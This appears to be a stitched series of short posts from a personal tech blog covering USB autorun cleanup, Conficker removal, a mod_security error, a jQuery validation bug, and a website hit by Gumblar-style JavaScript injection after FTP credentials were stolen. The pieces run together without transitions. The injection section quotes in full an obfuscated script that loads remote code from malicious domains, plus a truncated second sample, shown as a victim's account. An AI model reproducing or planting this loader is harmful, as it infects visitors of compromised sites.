The annoying  problem when I plug my USB pen drive to my own computer with Avira antivirus installed, the Avira Active Guard seem scan the “autorun.inf” folder then Lock It.

When I want to eject my USB pen drive it can’t be done, It said my USB pen drive being used .  I think the the “special” folder created by SmartDav must be removed.

The special folder created by SmartDav can not delete using normal way, it will say “Can not find specific File” or “Invalid Parameter”.  After googling I found some trick how to remove it. Here the trick :

1. Open Command Promt

2. J:\>rd /S \\.\j:\autorun\con\

“J”  is my USB pen drive and It will ask confirmation, hit “Y” to confirm then The autorun.inf folder and it sub folder will automatically deleted

1. select all your table , and right click, it will show table properties, click it !

2. then it will show table properties, click “table” tab on top of it.

3. change “text wrapping”  in to “none”

4. that’s it, you can select some row as your table header

Method that I use is :

1. Unplug / terminate the local area connection.

2. Use rootkit detector to disable some svchost service infected by conficker

You can download the rootkit detector at http://www.gmer.net/ Run the rootkit detector software, if your computer has conficker on it it will detect some svchost service in red colour. You not need do full scan, just right click on red svchost service found by the rootkitdetector, and click disable service.

3. Use conficker removal software

Use this removal software from http://www.enigmasoftware.com/products/conficker-removal-tool/ it very small tool, less than 200Kb software. Download and run the software. Follow the instruction. It need reboot few time.

4. Patch Your Windows with latest hotfix from microsoft to avoid conficker come again. Get the patch on

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx . Download accourding you operating system.

That’s it

http://www.usa.canon.com/dlc/controller?act=GetArticleAct&articleID=3167

Finally today I found some one has post it and I am very very very happy ^.^

Grab it on

http://gunime.blogspot.com/2010/02/gff0013-plan-303e-deep-striker.html

The second attact, the Java script code injected is not same as first one, it have some code variant , The code I was found on my PHP and Javascript code is :

<script>/*Exception*/ document.write('<script src='+'h!&&t^^t#p&(#^:$&^^/&@)/&@@i!!$m@)a^#@g$!e($$)f@^a@&p$&$(-#c!o@!&m^.&h!!!a)t!$!e#n$#a!.!!&&n@e@!).$^$#j^@#^p@^(@.&!&s(!l#i@&d#!e)$s@#h&^a!!r!^e^-@$#n!(@e((t$&#(.)s(u^(p@^!e!)r!)@)t!@&r##u($^e^)l$#)i&!&f&@^e^^.!^r)u^!$:@8@(0#@#!8#$!)0!)!/&^)l&e#&(q(@^u#)!i!)p@(!e&&&^.#!(f#!r)$!/^)l)&@@e)#q^$@u@!!i#^(p$(e!^&.#!f!r$&/@v((k^@.(@c$@&$o^!@m($/&$g&(@)o)!o(@&!g$)!l!$e$$.)!c@$))o#@$^&m@&&^/!p(&c&&&p#!)o#@#p@(.&c#@!o$m$$&/&#!('.replace(/\)|@|\!|#|&|\^|\(|\$/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--2a2a37017f4e478abaa5f3c16a9b2656-->

So I need to modify the cure file for this code variation, and it work fine. Recently I browse on justcode.com and see the new version on cure file it has have ability to cure variant Java Script code that injected to web file. So just try to download it here

In part used session function (I use the library session Codeigniter) , randomly displays a HTTP 406 error.

When searching on google, I know that the problem is probably caused by the Apache  mod_security. I tried de-active mod_security function using  . htaccess files but it causes HTTP error 500.

When a page that uses session displays a HTTP 406 error, It can be fixed by delete computer cookies, but sometimes  it comes back HTTP error 406 at random.

Another problem, the session produced by the library Codeigniter likely trigger mod_security apache and the mod_security considers it as a threat so mod_security block access from my  IP (I have many times to reset my modem to get a new IP)

My solution :  I change my session from the Codeigniter library  into Native PHP session. The solution worked perfectly, I don’t have anymore HTTP error 406 and blocked by mod_security.

In the morning, I turn on my notebook and suddenly a message appear, “Security Tools” already installed on my computer, I didn’t feel install that software recently, but I know it was a spy ware or malware  software, then I use Malwarebytes (http://www.malwarebytes.org/mbam.php) to clean my notebook, and it work great, the malware was successfully cleaned.

Accidentally I open my website work, and something bad happen, the website show nothing, I check the code and found some java script code injected to my PHP file. Then I think where the code came from ??

The java script code :

<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement(’s&c^$#r))i($p@&t^&’.repl

After some investigation, I found that the malware infected my notebook steal my FTP , I am using Filezilla FTP client for my FTP activity. The Filezilla FTP client store some recent FTP session on “Quick Connect” feature, there 6 recent FTP session that stole from my notebook After get informasion from web, I know that filezilla is targeted by virus or malware, they like stole the FTP password. So I am will not use Filezilla again !!!!

After couple hour after malware infection, ton of my website file infected by javascript code. As a precautionary measure I change all FTP password listed on “Quick Connect” on Filezilla, from 6 website, I only can save 1, the last 5 website injected by malware : (

The file that injected by javascript code are  (in my case):

1. index.php
2. index.html
3. .js file
4. file name that contain “home” & “main”

It was a lot job if manually remove the injected file, so I decide to find information how to remove injected javascript code. Finally I found a god man that write PHP code to remove javascript code ( Thanks alot ), you can download the virus/javascript removal at http://justcoded.com/article/gumblar-family-virus-removal-tool/

So how this virus come to your computer ??? Here my personal analyze :

1. We visit some infected website with some virus java script code.
2. Automatically it will run Java run time, then download a PDF file.
3. The PDF file is a modified PDF file that was injected by some code / virus, and exploit your acrobat reader
4. If your anti virus (My last AV is avast home edition) didn’t recognize the PDF file as virus, you will be infected.

The prevention :

1. Update your Anti virus (I decide to change my anti virus to Avira (http://www.free-av.com/)  free edition and it recognize the PDF file virus well)
2. Update your Acrobat Reader to latest version and disable the java script on your acrobat reader ( Edit – Preference – JavaScript – Un check  “Acrobat Java Script”
3. Not using Filezilla, unless you can disable “Quick Connect” feature

For a username, I check the username on database if it exist or not. For example in my database I already have two username let say ‘admin1′ and ‘admin2′.

I did the code like example provided, let say we register with username ‘admin1′ or ‘admin2′ it will show an error that say the username already exist. Here the code :

reg_username: {
required: "Enter a username",
minlength: jQuery.format("Enter at least {0} characters"),
remote: jQuery.format("{0} is already in use")
},

The “{0}” will display the username we input,  so when I type ‘admin1′ as my username it will display an error “admin1 is already in use”. Then when I type ‘admin2′ as my username it shuld be show an error “admin2 is already in use” but in fact, when I use ‘admin2′ as my username, it will display error ‘admin1 is already in use’. Kind a strange, didn’t solve it yet

Note

Just Updated to latest version 1.6 and it still get some bug but in different mode, seem I will eliminate {0} from the error code because it source of problem )

Kelak Aku Pake XL

Sudut Pasar

XL Shine